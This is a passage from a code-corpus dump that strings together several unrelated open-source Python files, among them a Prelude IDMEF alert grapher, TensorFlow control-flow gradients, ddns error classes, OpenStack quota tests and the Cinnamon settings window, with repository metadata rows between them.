finished_computers += filter(lambda c: c.wiped and c.is_registered, g.computers)
total_progress = 0.0
no_busy_computers = float(len(busy_computers))
for c in busy_computers:
total_progress += c.progress() / no_busy_computers
# Update window title
if no_busy_computers > 0:
self.win.set_title('LCRS (busy)')
elif no_computers == 0:
self.win.set_title('LCRS')
elif len(finished_computers) == no_computers:
self.win.set_title('LCRS (everything complete)')
else:
self.win.set_title('LCRS (inactive)')
progress_label = "Total computers: %d / Busy: %d" % (no_computers, no_busy_computers)
self.getWidget("labelProgressbarTotal").set_text(progress_label)
self.getWidget('progressbarTotal').set_fraction(total_progress)
def update_overall_status(self):
gobject.idle_add(self._update_overall_status)
def add_group(self):
def do_add_group():
name = self.getWidget("entryGroupname").get_text()
self.master_instance.addGroup(name)
gobject.idle_add(do_add_group)
def appendGroup(self, group):
def do_append_group(group):
"""
Adds a new group to the UI.
"""
assert not group in self.groups, "Group already added."
groupPage = GroupPage(group, self)
self.groupNotebook.insert_page(groupPage.getPageWidget(), groupPage.getLabelWidget(), len(self.groups))
self.groupNotebook.prev_page()
self.groups[group] = groupPage
self.update_overall_status()
gobject.idle_add(do_append_group, group)
def appendComputer(self, computer, group=None):
def do_append_computer(computer, group):
"""
Append a table row to the model object and a page to the notebook.
The page is GtkBuilder'ed from a Glade file.
"""
self.update_overall_status()
if not group:
group = self.groups.keys()[0]
self.groups[group].addComputer(computer)
self.update_overall_status()
gobject.idle_add(do_append_computer, computer, group)
gobject.idle_add(self.alert_plugins, 'on-add-computer')
def update_computer(self, computer):
"""Find a computer in the right group and update its GtkNotebook page..."""
for group in self.groups.keys():
if computer in group.computers:
self.groups[group].update_computer(computer)
def open_preferences(self, *args):
_ = PreferencesWindow()
| gpl-3.0 | -1,067,136,764,861,414,500 | 33.977064 | 115 | 0.595016 | false |
chifflier/libprelude | bindings/tools/idmef-path-gd.py | 4 | 5722 | #!/usr/bin/python
#
# Graph IDMEF Messages
#
import time
import sys
sys.path.append('.')
sys.path.append('./.libs')
import gd
try:
import PreludeEasy
except:
print "Import failed"
print "Try 'cd ./.libs && ln -s libprelude_python.so _PreludeEasy.so'"
sys.exit(1)
#
# GD Constants
#
timeline_x = 100
severity_x = 300
classification_x = 500
header_size_y = 20
image_width = 800
image_height = 400+header_size_y
severity_high_y = 50 + header_size_y
severity_medium_y = 150 + header_size_y
severity_low_y = 250 + header_size_y
severity_info_y = 350 + header_size_y
im = gd.image((image_width, image_height))
white = im.colorAllocate((255, 255, 255))
black = im.colorAllocate((0, 0, 0))
red = im.colorAllocate((255, 0, 0))
orange = im.colorAllocate((255, 100, 0))
blue = im.colorAllocate((0, 0, 255))
green = im.colorAllocate((0, 255, 0))
client = PreludeEasy.Client("PoolingTest")
client.Init()
client.PoolInit("192.168.33.215", 1)
def gd_init():
FONT = "/usr/share/fonts/truetype/ttf-bitstream-vera/VeraMono.ttf"
# Headers
im.line((0,header_size_y),(image_width,header_size_y),black)
im.string_ttf(FONT, 8, 0, (70,12), "timeline", black)
im.line((200,0),(200,header_size_y), black)
im.string_ttf(FONT, 8, 0, (250,12), "impact.severity", black)
im.line((400,0),(400,header_size_y), black)
im.string_ttf(FONT, 8, 0, (450,12), "classification.text", black)
im.line((600,0),(600,header_size_y), black)
# Line for timeline
im.line((timeline_x,header_size_y),(timeline_x,image_height),black)
# Lines for severity
im.line((severity_x,header_size_y),(severity_x,image_height-300),red)
im.line((severity_x,image_height-300),(severity_x,image_height-200),orange)
im.line((severity_x,image_height-200),(severity_x,image_height-100),green)
im.line((severity_x,image_height-100),(severity_x,image_height),blue)
# Line for classification.text
im.line((classification_x,header_size_y),(classification_x,image_height),black)
# return im
gd_init()
def plot_timeline():
t = time.localtime()
hour = t[3]
minute = t[4]
second = t[5]
hour_factor = 400.0 / 24.0
mn_factor = hour_factor / 60.0
hour_y = hour_factor * hour
mn_y = mn_factor * minute
plot_y = hour_y + mn_y
return int(plot_y)
#
# 10000 could be considered as the maximum, since
# it would cover already a big classification.text
#
def unique_alert_number(ClassificationText):
number = 0
for c in ClassificationText:
number += ord(c)
return number
def classification_text_pos(text):
classification_factor = 400.0 / 10000.0
nb = unique_alert_number(text)
print "Unique number = " + str(nb)
c_y = classification_factor * nb
print "Position C-Y = " + str(c_y)
return int(c_y + header_size_y)
def handle_alert(idmef):
classificationtext = idmef.Get("alert.classification.text")
print classificationtext
# if value:
# print value
# value = idmef.Get("alert.assessment.impact.description")
# if value:
# print value
# value = idmef.Get("alert.assessment.impact.completion")
# if value:
# print value
# value = idmef.Get("alert.classification.ident")
# if value:
# print value
# value = idmef.Get("alert.source(0).ident")
# if value:
# print value
# value = idmef.Get("alert.classification.ident")
# if value:
# print value
# value = idmef.Get("alert.classification.reference(0).origin")
# if value:
# print value
# value = idmef.Get("alert.classification.reference(0).name")
# if value:
# print value
severity = idmef.Get("alert.assessment.impact.severity")
if severity:
time_y = plot_timeline() + header_size_y
print "Time Y = " + str(time_y)
if severity == "high":
im.line((timeline_x, time_y),(severity_x, severity_high_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_high_y),(classification_x, c_y), black)
if severity == "medium":
im.line((timeline_x, time_y),(severity_x, severity_medium_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_medium_y),(classification_x, c_y), black)
if severity == "low":
im.line((timeline_x, time_y),(severity_x, severity_low_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_low_y),(classification_x, c_y), black)
if severity == "info":
im.line((timeline_x, time_y),(severity_x, severity_info_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_info_y),(classification_x, c_y), black)
# print "hour=" + str(hour) + " mn=" + str(minute)
im.writePng("idmef-graph.png")
while 1:
idmef = client.ReadIDMEF(1)
if idmef:
handle_alert(idmef)
time.sleep(1)
| gpl-2.0 | -7,571,392,418,003,852,000 | 28.647668 | 99 | 0.573401 | false |
moonboots/tensorflow | tensorflow/python/ops/control_flow_grad.py | 2 | 7938 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in control_flow_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
# pylint: disable=wildcard-import,undefined-variable
from tensorflow.python.ops.control_flow_ops import *
from tensorflow.python.ops.gen_control_flow_ops import *
# pylint: enable=wildcard-import
def _SwitchGrad(op, *grad):
"""Gradients for a Switch op is calculated using a Merge op.
If the switch is a loop switch, it will be visited twice. We create
the merge on the first visit, and update the other input of the merge
on the second visit. A next_iteration is also added on second visit.
"""
graph = ops.get_default_graph()
# pylint: disable=protected-access
op_ctxt = op._get_control_flow_context()
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if isinstance(op_ctxt, WhileContext):
merge_op = grad_ctxt.grad_state.switch_map.get(op)
if merge_op:
# This is the second time this Switch is visited. It comes from
# the non-exit branch of the Switch, so update the second input
# to the Merge.
# TODO: Perform shape inference with this new input.
# pylint: disable=protected-access
merge_op._update_input(1, control_flow_ops._NextIteration(grad[1]))
# pylint: enable=protected-access
return None, None
else:
# This is the first time this Switch is visited. It always comes
# from the Exit branch, which is grad[0]. grad[1] is empty at this point.
# Use grad[0] for both inputs to merge for now, but update the second
# input of merge when we see this Switch the second time.
merge_fn = control_flow_ops._Merge # pylint: disable=protected-access
merge_op = merge_fn([grad[0], grad[0]], name="b_switch")[0]
grad_ctxt.grad_state.switch_map[op] = merge_op.op
return merge_op, None
elif isinstance(op_ctxt, CondContext):
good_grad = grad[op_ctxt.branch]
zero_grad = grad[1 - op_ctxt.branch]
# If we are in a grad context, this switch is part of a cond within a
# loop. In this case, we have called ControlFlowState.ZeroLike() so grad
# is ready for merge. Otherwise, we need a switch to control zero_grad.
if not (grad_ctxt and grad_ctxt.grad_state):
dtype = good_grad.dtype
branch = op_ctxt.branch
zero_grad = switch(zero_grad, op_ctxt.pred, dtype=dtype)[1 - branch]
return merge([good_grad, zero_grad], name="cond_grad")[0], None
else:
false_grad = switch(grad[0], op.inputs[1])[0]
true_grad = switch(grad[1], op.inputs[1])[1]
return merge([false_grad, true_grad])[0], None
ops.RegisterGradient("Switch")(_SwitchGrad)
ops.RegisterGradient("RefSwitch")(_SwitchGrad)
@ops.RegisterGradient("Merge")
def _MergeGrad(op, grad, _):
"""Gradients for a Merge op are calculated using a Switch op."""
input_op = op.inputs[0].op
graph = ops.get_default_graph()
# pylint: disable=protected-access
op_ctxt = input_op._get_control_flow_context()
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if isinstance(op_ctxt, WhileContext):
# pylint: disable=protected-access
return control_flow_ops._SwitchRefOrTensor(grad, grad_ctxt.pivot)
# pylint: enable=protected-access
elif isinstance(op_ctxt, CondContext):
pred = op_ctxt.pred
if grad_ctxt and grad_ctxt.grad_state:
# This Merge node is part of a cond within a loop.
# The backprop needs to have the value of this predicate for every
# iteration. So we must have its values accumulated in the forward, and
# use the accumulated values as the predicate for this backprop switch.
grad_state = grad_ctxt.grad_state
real_pred = grad_state.history_map.get(pred.name)
if real_pred is None:
# Remember the value of pred for every iteration.
grad_ctxt = grad_state.grad_context
grad_ctxt.Exit()
history_pred = grad_state.AddForwardAccumulator(pred)
grad_ctxt.Enter()
# Add the stack pop op. If pred.op is in a (outer) CondContext,
# the stack pop will be guarded with a switch.
real_pred = grad_state.AddBackPropAccumulatedValue(history_pred, pred)
grad_state.history_map[pred.name] = real_pred
pred = real_pred
# pylint: disable=protected-access
return control_flow_ops._SwitchRefOrTensor(grad, pred, name="cond_grad")
# pylint: enable=protected-access
else:
num_inputs = len(op.inputs)
cond = [math_ops.equal(op.outputs[1], i) for i in xrange(num_inputs)]
# pylint: disable=protected-access
return [control_flow_ops._SwitchRefOrTensor(grad, cond[i])[1]
for i in xrange(num_inputs)]
# pylint: enable=protected-access
@ops.RegisterGradient("RefMerge")
def _RefMergeGrad(op, grad, _):
return _MergeGrad(op, grad, _)
@ops.RegisterGradient("Exit")
def _ExitGrad(_, grad):
"""Gradients for an exit op are calculated using an Enter op."""
graph = ops.get_default_graph()
# pylint: disable=protected-access
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if not grad_ctxt.back_prop:
# The flag `back_prop` is set by users to suppress gradient
# computation for this loop. If the flag `back_prop` is true,
# no gradient computation.
return None
grad_ctxt.AddName(grad.name)
enter_fn = control_flow_ops._Enter # pylint: disable=protected-access
grad_ctxt.Enter()
result = enter_fn(grad, grad_ctxt.name, is_constant=False,
parallel_iterations=grad_ctxt.parallel_iterations,
name="b_exit")
grad_ctxt.Exit()
return result
ops.RegisterGradient("RefExit")(_ExitGrad)
@ops.RegisterGradient("NextIteration")
def _NextIterationGrad(_, grad):
"""A forward next_iteration is translated into a backprop identity.
Note that the backprop next_iteration is added in switch grad.
"""
return grad
@ops.RegisterGradient("RefNextIteration")
def _RefNextIterationGrad(_, grad):
return _NextIterationGrad(_, grad)
@ops.RegisterGradient("Enter")
def _EnterGrad(op, grad):
"""Gradients for an Enter are calculated using an Exit op.
For loop variables, grad is the gradient so just add an exit.
For loop invariants, we need to add an accumulator loop.
"""
graph = ops.get_default_graph()
# pylint: disable=protected-access
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if not grad_ctxt.back_prop:
# If the flag `back_prop` is true, no gradient computation.
return grad
if op.get_attr("is_constant"):
# Add a gradient accumulator for each loop invariant.
result = grad_ctxt.AddBackPropAccumulator(grad)
else:
result = exit(grad)
grad_ctxt.ExitResult([result])
return result
@ops.RegisterGradient("RefEnter")
def _RefEnterGrad(op, grad):
return _EnterGrad(op, grad)
@ops.RegisterGradient("LoopCond")
def _LoopCondGrad(_):
"""Stop backprop for the predicate of a while loop."""
return None
| apache-2.0 | -2,382,441,656,723,787,300 | 37.533981 | 80 | 0.695767 | false |
nils-wisiol/ddns | src/ddns/errors.py | 1 | 4280 | #!/usr/bin/python
###############################################################################
# #
# ddns - A dynamic DNS client for IPFire #
# Copyright (C) 2012 IPFire development team #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
N_ = lambda x: x
class DDNSError(Exception):
"""
Generic error class for all exceptions
raised by DDNS.
"""
reason = N_("Error")
def __init__(self, message=None):
self.message = message
class DDNSNetworkError(DDNSError):
"""
Thrown when a network error occured.
"""
reason = N_("Network error")
class DDNSAbuseError(DDNSError):
"""
Thrown when the server reports
abuse for this account.
"""
reason = N_("The server denied processing the request because account abuse is suspected")
class DDNSAuthenticationError(DDNSError):
"""
Thrown when the server did not
accept the user credentials.
"""
reason = N_("Authentication against the server has failed")
class DDNSBlockedError(DDNSError):
"""
Thrown when the dynamic update client
(specified by the user-agent) has been blocked
by a dynamic DNS provider.
"""
reason = N_("The server denies any updates from this client")
class DDNSConfigurationError(DDNSError):
"""
Thrown when invalid or insufficient
data is provided by the configuration file.
"""
reason = N_("The configuration file has errors")
class DDNSConnectionRefusedError(DDNSNetworkError):
"""
Thrown when a connection is refused.
"""
reason = N_("Connection refused")
class DDNSConnectionTimeoutError(DDNSNetworkError):
"""
Thrown when a connection to a server has timed out.
"""
reason = N_("Connection timeout")
class DDNSHostNotFoundError(DDNSError):
"""
Thrown when a configuration entry could
not be found.
"""
reason = N_("The host could not be found in the configuration file")
class DDNSInternalServerError(DDNSError):
"""
Thrown when the remote server reported
an error on the provider site.
"""
reason = N_("Internal server error")
class DDNSNetworkUnreachableError(DDNSNetworkError):
"""
Thrown when a network is not reachable.
"""
reason = N_("Network unreachable")
class DDNSNoRouteToHostError(DDNSNetworkError):
"""
Thrown when there is no route to a host.
"""
reason = N_("No route to host")
class DDNSNotFound(DDNSError):
"""
Thrown when the called URL has not been found
"""
reason = N_("Not found")
class DDNSRequestError(DDNSError):
"""
Thrown when a request could
not be properly performed.
"""
reason = N_("Request error")
class DDNSResolveError(DDNSNetworkError):
"""
Thrown when a DNS record could not be resolved
because of a local error.
"""
reason = N_("Could not resolve DNS entry")
class DDNSServiceUnavailableError(DDNSNetworkError):
"""
Equivalent to HTTP error code 503.
"""
reason = N_("Service unavailable")
class DDNSUpdateError(DDNSError):
"""
Thrown when an update could not be
properly performed.
"""
reason = N_("The update could not be performed")
| gpl-3.0 | 8,554,441,590,693,067,000 | 26.792208 | 91 | 0.589252 | false |
ctrlaltdel/neutrinator | vendor/openstack/tests/unit/load_balancer/test_quota.py | 3 | 2997 | # Copyright (c) 2018 China Telecom Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.tests.unit import base
from openstack.load_balancer.v2 import quota
IDENTIFIER = 'IDENTIFIER'
EXAMPLE = {
'load_balancer': 1,
'listener': 2,
'pool': 3,
'health_monitor': 4,
'member': 5,
'project_id': 6,
}
class TestQuota(base.TestCase):
def test_basic(self):
sot = quota.Quota()
self.assertEqual('quota', sot.resource_key)
self.assertEqual('quotas', sot.resources_key)
self.assertEqual('/lbaas/quotas', sot.base_path)
self.assertFalse(sot.allow_create)
self.assertTrue(sot.allow_fetch)
self.assertTrue(sot.allow_commit)
self.assertTrue(sot.allow_delete)
self.assertTrue(sot.allow_list)
def test_make_it(self):
sot = quota.Quota(**EXAMPLE)
self.assertEqual(EXAMPLE['load_balancer'], sot.load_balancers)
self.assertEqual(EXAMPLE['listener'], sot.listeners)
self.assertEqual(EXAMPLE['pool'], sot.pools)
self.assertEqual(EXAMPLE['health_monitor'], sot.health_monitors)
self.assertEqual(EXAMPLE['member'], sot.members)
self.assertEqual(EXAMPLE['project_id'], sot.project_id)
def test_prepare_request(self):
body = {'id': 'ABCDEFGH', 'load_balancer': '12345'}
quota_obj = quota.Quota(**body)
response = quota_obj._prepare_request()
self.assertNotIn('id', response)
class TestQuotaDefault(base.TestCase):
def test_basic(self):
sot = quota.QuotaDefault()
self.assertEqual('quota', sot.resource_key)
self.assertEqual('quotas', sot.resources_key)
self.assertEqual('/lbaas/quotas/defaults', sot.base_path)
self.assertFalse(sot.allow_create)
self.assertTrue(sot.allow_fetch)
self.assertFalse(sot.allow_commit)
self.assertFalse(sot.allow_delete)
self.assertFalse(sot.allow_list)
self.assertTrue(sot.allow_retrieve)
def test_make_it(self):
sot = quota.Quota(**EXAMPLE)
self.assertEqual(EXAMPLE['load_balancer'], sot.load_balancers)
self.assertEqual(EXAMPLE['listener'], sot.listeners)
self.assertEqual(EXAMPLE['pool'], sot.pools)
self.assertEqual(EXAMPLE['health_monitor'], sot.health_monitors)
self.assertEqual(EXAMPLE['member'], sot.members)
self.assertEqual(EXAMPLE['project_id'], sot.project_id)
| gpl-3.0 | -2,897,508,562,307,050,000 | 36 | 78 | 0.669002 | false |
gastrodia/Cinnamon | files/usr/lib/cinnamon-settings/cinnamon-settings.py | 7 | 25817 | #!/usr/bin/env python2
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/usr/lib/cinnamon-settings/modules')
sys.path.append('/usr/lib/cinnamon-settings/bin')
import os
import glob
import gettext
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gio, Gtk, GObject, GdkPixbuf, GLib, Pango, Gdk, cairo
import SettingsWidgets
import capi
import time
import traceback
import locale
import urllib2
import proxygsettings
from functools import cmp_to_key
# i18n
gettext.install("cinnamon", "/usr/share/locale")
# Standard setting pages... this can be expanded to include applet dirs maybe?
mod_files = glob.glob('/usr/lib/cinnamon-settings/modules/*.py')
mod_files.sort()
if len(mod_files) is 0:
print "No settings modules found!!"
sys.exit(1)
mod_files = [x.split('/')[5].split('.')[0] for x in mod_files]
for mod_file in mod_files:
if mod_file[0:3] != "cs_":
raise Exception("Settings modules must have a prefix of 'cs_' !!")
modules = map(__import__, mod_files)
# i18n for menu item
menuName = _("System Settings")
menuComment = _("Control Center")
WIN_WIDTH = 800
WIN_HEIGHT = 600
WIN_H_PADDING = 20
MIN_LABEL_WIDTH = 16
MAX_LABEL_WIDTH = 25
MIN_PIX_WIDTH = 100
MAX_PIX_WIDTH = 160
MOUSE_BACK_BUTTON = 8
CATEGORIES = [
# Display name ID Show it? Always False to start Icon
{"label": _("Appearance"), "id": "appear", "show": False, "icon": "cs-cat-appearance"},
{"label": _("Preferences"), "id": "prefs", "show": False, "icon": "cs-cat-prefs"},
{"label": _("Hardware"), "id": "hardware", "show": False, "icon": "cs-cat-hardware"},
{"label": _("Administration"), "id": "admin", "show": False, "icon": "cs-cat-admin"}
]
CONTROL_CENTER_MODULES = [
# Label Module ID Icon Category Keywords for filter
[_("Networking"), "network", "cs-network", "hardware", _("network, wireless, wifi, ethernet, broadband, internet")],
[_("Display"), "display", "cs-display", "hardware", _("display, screen, monitor, layout, resolution, dual, lcd")],
[_("Bluetooth"), "bluetooth", "cs-bluetooth", "hardware", _("bluetooth, dongle, transfer, mobile")],
[_("Accessibility"), "universal-access", "cs-universal-access", "prefs", _("magnifier, talk, access, zoom, keys, contrast")],
[_("Sound"), "sound", "cs-sound", "hardware", _("sound, speakers, headphones, test")],
[_("Color"), "color", "cs-color", "hardware", _("color, profile, display, printer, output")],
[_("Graphics Tablet"), "wacom", "cs-tablet", "hardware", _("wacom, digitize, tablet, graphics, calibrate, stylus")]
]
STANDALONE_MODULES = [
# Label Executable Icon Category Keywords for filter
[_("Printers"), "system-config-printer", "cs-printer", "hardware", _("printers, laser, inkjet")],
[_("Firewall"), "gufw", "cs-firewall", "admin", _("firewall, block, filter, programs")],
[_("Languages"), "mintlocale", "cs-language", "prefs", _("language, install, foreign")],
[_("Login Window"), "gksu /usr/sbin/mdmsetup", "cs-login", "admin", _("login, mdm, gdm, manager, user, password, startup, switch")],
[_("Driver Manager"), "mintdrivers", "cs-drivers", "admin", _("video, driver, wifi, card, hardware, proprietary, nvidia, radeon, nouveau, fglrx")],
[_("Software Sources"), "mintsources", "cs-sources", "admin", _("ppa, repository, package, source, download")],
[_("Users and Groups"), "cinnamon-settings-users", "cs-user-accounts", "admin", _("user, users, account, accounts, group, groups, password")],
[_("Bluetooth"), "blueberry", "cs-bluetooth", "hardware", _("bluetooth, dongle, transfer, mobile")]
]
def print_timing(func):
def wrapper(*arg):
t1 = time.time()
res = func(*arg)
t2 = time.time()
print '%s took %0.3f ms' % (func.func_name, (t2-t1)*1000.0)
return res
return wrapper
def touch(fname, times=None):
with file(fname, 'a'):
os.utime(fname, times)
class MainWindow:
# Change pages
def side_view_nav(self, side_view, path, cat):
selected_items = side_view.get_selected_items()
if len(selected_items) > 0:
self.deselect(cat)
filtered_path = side_view.get_model().convert_path_to_child_path(selected_items[0])
if filtered_path is not None:
self.go_to_sidepage(cat, filtered_path)
def _on_sidepage_hide_stack(self):
self.stack_switcher.set_opacity(0)
def _on_sidepage_show_stack(self):
self.stack_switcher.set_opacity(1)
def go_to_sidepage(self, cat, path):
iterator = self.store[cat].get_iter(path)
sidePage = self.store[cat].get_value(iterator,2)
if not sidePage.is_standalone:
self.window.set_title(sidePage.name)
sidePage.build()
if sidePage.stack:
current_page = sidePage.stack.get_visible_child_name()
self.stack_switcher.set_stack(sidePage.stack)
l = sidePage.stack.get_children()
if len(l) > 0:
sidePage.stack.set_visible_child(l[0])
if sidePage.stack.get_visible():
self.stack_switcher.set_opacity(1)
else:
self.stack_switcher.set_opacity(0)
if hasattr(sidePage, "connect_proxy"):
sidePage.connect_proxy("hide_stack", self._on_sidepage_hide_stack)
sidePage.connect_proxy("show_stack", self._on_sidepage_show_stack)
else:
self.stack_switcher.set_opacity(0)
else:
self.stack_switcher.set_opacity(0)
self.main_stack.set_visible_child_name("content_box_page")
self.header_stack.set_visible_child_name("content_box")
self.current_sidepage = sidePage
width = 0
for widget in self.top_bar:
m, n = widget.get_preferred_width()
width += n
self.top_bar.set_size_request(width + 20, -1)
self.maybe_resize(sidePage)
else:
sidePage.build()
def maybe_resize(self, sidePage):
m, n = self.content_box.get_preferred_size()
# Resize horizontally if the module is wider than the window
use_width = WIN_WIDTH
if n.width > WIN_WIDTH:
use_width = n.width
# Resize vertically depending on the height requested by the module
use_height = WIN_HEIGHT
if not sidePage.size:
# No height requested, resize vertically if the module is taller than the window
if n.height > WIN_HEIGHT:
use_height = n.height + self.bar_heights + WIN_H_PADDING
#self.window.resize(use_width, n.height + self.bar_heights + WIN_H_PADDING)
elif sidePage.size > 0:
# Height hardcoded by the module
use_height = sidePage.size + self.bar_heights + WIN_H_PADDING
elif sidePage.size == -1:
# Module requested the window to fit it (i.e. shrink the window if necessary)
use_height = n.height + self.bar_heights + WIN_H_PADDING
self.window.resize(use_width, use_height)
def deselect(self, cat):
for key in self.side_view.keys():
if key is not cat:
self.side_view[key].unselect_all()
''' Create the UI '''
@print_timing
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("/usr/lib/cinnamon-settings/cinnamon-settings.ui")
self.window = self.builder.get_object("main_window")
self.top_bar = self.builder.get_object("top_bar")
self.side_view = {}
self.main_stack = self.builder.get_object("main_stack")
self.main_stack.set_transition_type(Gtk.StackTransitionType.CROSSFADE)
self.main_stack.set_transition_duration(150)
self.header_stack = self.builder.get_object("header_stack")
self.header_stack.set_transition_type(Gtk.StackTransitionType.CROSSFADE)
self.header_stack.set_transition_duration(150)
self.side_view_container = self.builder.get_object("category_box")
self.side_view_sw = self.builder.get_object("side_view_sw")
self.side_view_sw.show_all()
self.content_box = self.builder.get_object("content_box")
self.content_box_sw = self.builder.get_object("content_box_sw")
self.content_box_sw.show_all()
self.button_back = self.builder.get_object("button_back")
self.button_back.set_tooltip_text(_("Back to all settings"))
button_image = self.builder.get_object("image1")
button_image.props.icon_size = Gtk.IconSize.MENU
self.stack_switcher = self.builder.get_object("stack_switcher")
# Set stack to random thing and make opacity 0 so that the heading bar
# does not resize when switching between pages
self.stack_switcher.set_stack(self.main_stack)
m, n = self.button_back.get_preferred_width()
self.stack_switcher.set_margin_right(n)
self.search_entry = self.builder.get_object("search_box")
self.search_entry.connect("changed", self.onSearchTextChanged)
self.search_entry.connect("icon-press", self.onClearSearchBox)
self.window.connect("destroy", self.quit)
self.window.connect("key-press-event", self.on_keypress)
self.window.connect("button-press-event", self.on_buttonpress)
self.window.show()
self.builder.connect_signals(self)
self.window.set_has_resize_grip(False)
self.unsortedSidePages = []
self.sidePages = []
self.settings = Gio.Settings.new("org.cinnamon")
self.current_cat_widget = None
self.current_sidepage = None
self.c_manager = capi.CManager()
self.content_box.c_manager = self.c_manager
self.bar_heights = 0
for module in modules:
try:
mod = module.Module(self.content_box)
if self.loadCheck(mod) and self.setParentRefs(mod):
self.unsortedSidePages.append((mod.sidePage, mod.name, mod.category))
except:
print "Failed to load module %s" % module
traceback.print_exc()
for item in CONTROL_CENTER_MODULES:
ccmodule = SettingsWidgets.CCModule(item[0], item[1], item[2], item[3], item[4], self.content_box)
if ccmodule.process(self.c_manager):
self.unsortedSidePages.append((ccmodule.sidePage, ccmodule.name, ccmodule.category))
for item in STANDALONE_MODULES:
samodule = SettingsWidgets.SAModule(item[0], item[1], item[2], item[3], item[4], self.content_box)
if samodule.process():
self.unsortedSidePages.append((samodule.sidePage, samodule.name, samodule.category))
# sort the modules alphabetically according to the current locale
sidePageNamesToSort = map(lambda m: m[0].name, self.unsortedSidePages)
sortedSidePageNames = sorted(sidePageNamesToSort, key=cmp_to_key(locale.strcoll))
for sidePageName in sortedSidePageNames:
nextSidePage = None
for trySidePage in self.unsortedSidePages:
if(trySidePage[0].name == sidePageName):
nextSidePage = trySidePage
self.sidePages.append(nextSidePage);
# create the backing stores for the side nav-view.
sidePagesIters = {}
self.store = {}
self.storeFilter = {}
for sidepage in self.sidePages:
sp, sp_id, sp_cat = sidepage
if not self.store.has_key(sp_cat): # Label Icon sidePage Category
self.store[sidepage[2]] = Gtk.ListStore(str, str, object, str)
for category in CATEGORIES:
if category["id"] == sp_cat:
category["show"] = True
# Don't allow item names (and their translations) to be more than 30 chars long. It looks ugly and it creates huge gaps in the icon views
name = unicode(sp.name,'utf-8')
if len(name) > 30:
name = "%s..." % name[:30]
sidePagesIters[sp_id] = (self.store[sp_cat].append([name, sp.icon, sp, sp_cat]), sp_cat)
self.min_label_length = 0
self.min_pix_length = 0
for key in self.store.keys():
char, pix = self.get_label_min_width(self.store[key])
self.min_label_length = max(char, self.min_label_length)
self.min_pix_length = max(pix, self.min_pix_length)
self.storeFilter[key] = self.store[key].filter_new()
self.storeFilter[key].set_visible_func(self.filter_visible_function)
self.min_label_length += 2
self.min_pix_length += 4
self.min_label_length = max(self.min_label_length, MIN_LABEL_WIDTH)
self.min_pix_length = max(self.min_pix_length, MIN_PIX_WIDTH)
self.min_label_length = min(self.min_label_length, MAX_LABEL_WIDTH)
self.min_pix_length = min(self.min_pix_length, MAX_PIX_WIDTH)
self.displayCategories()
# set up larger components.
self.window.set_title(_("System Settings"))
self.button_back.connect('clicked', self.back_to_icon_view)
self.calculate_bar_heights()
# Select the first sidePage
if len(sys.argv) > 1 and sys.argv[1] in sidePagesIters.keys():
(iter, cat) = sidePagesIters[sys.argv[1]]
path = self.store[cat].get_path(iter)
if path:
self.go_to_sidepage(cat, path)
else:
self.search_entry.grab_focus()
else:
self.search_entry.grab_focus()
def on_keypress(self, widget, event):
grab = False
device = Gtk.get_current_event_device()
if device.get_source() == Gdk.InputSource.KEYBOARD:
grab = Gdk.Display.get_default().device_is_grabbed(device)
if not grab and event.keyval == Gdk.KEY_BackSpace and (type(self.window.get_focus()) not in
(Gtk.TreeView, Gtk.Entry, Gtk.SpinButton, Gtk.TextView)):
self.back_to_icon_view(None)
return True
return False
def on_buttonpress(self, widget, event):
if event.button == MOUSE_BACK_BUTTON:
self.back_to_icon_view(None)
return True
return False
def calculate_bar_heights(self):
h = 0
m, n = self.top_bar.get_preferred_size()
h += n.height
self.bar_heights = h
def onSearchTextChanged(self, widget):
self.displayCategories()
def onClearSearchBox(self, widget, position, event):
if position == Gtk.EntryIconPosition.SECONDARY:
self.search_entry.set_text("")
def filter_visible_function(self, model, iter, user_data = None):
sidePage = model.get_value(iter, 2)
text = self.search_entry.get_text().lower()
if sidePage.name.lower().find(text) > -1 or \
sidePage.keywords.lower().find(text) > -1:
return True
else:
return False
def displayCategories(self):
widgets = self.side_view_container.get_children()
for widget in widgets:
widget.destroy()
self.first_category_done = False # This is just to prevent an extra separator showing up before the first category
for category in CATEGORIES:
if category["show"] is True:
self.prepCategory(category)
self.side_view_container.show_all()
def get_label_min_width(self, model):
min_width_chars = 0
min_width_pixels = 0
icon_view = Gtk.IconView()
